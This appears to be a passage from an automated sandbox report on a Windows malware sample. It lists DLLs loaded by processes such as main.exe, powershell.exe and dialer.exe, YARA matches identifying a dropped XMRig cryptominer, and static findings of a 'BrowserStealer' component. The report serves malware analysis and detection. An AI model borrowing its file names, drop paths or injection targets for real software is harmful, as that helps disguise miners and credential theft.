                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: dxgidebug.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: version.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\ProgramData\main.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: napinsp.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: pnrpnsp.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: wshbth.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: nlaapi.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: winrnr.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                                  Source: 49.2.dialer.exe.21cc15ed520.3.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                  Source: 49.2.dialer.exe.21cc15ed520.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                  Source: 49.2.dialer.exe.21cc15ed520.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                  Source: 49.2.dialer.exe.21cc15ed520.3.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                  Source: 49.2.dialer.exe.21cc15ed520.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                  Source: 49.2.dialer.exe.21cc15ed520.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                  Source: 49.2.dialer.exe.21cc15e9c40.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                  Source: 49.2.dialer.exe.21cc15e9c40.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                  Source: 49.2.dialer.exe.21cc15e9c40.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                  Source: 00000031.00000002.2888080335.0000021CC15E7000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                  Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                  Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                  Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                  Source: main.exe.4.dr, utils.csCryptographic APIs: 'CreateDecryptor'
                                  Source: Update.exe.5.dr, utils.csCryptographic APIs: 'CreateDecryptor'
                                  Source: main.exe.4.dr, BrowserStealer.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: main.exe.4.dr, utils.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: main.exe.4.dr, utils.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: Update.exe.5.dr, utils.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: Update.exe.5.dr, utils.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: Update.exe.5.dr, BrowserStealer.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
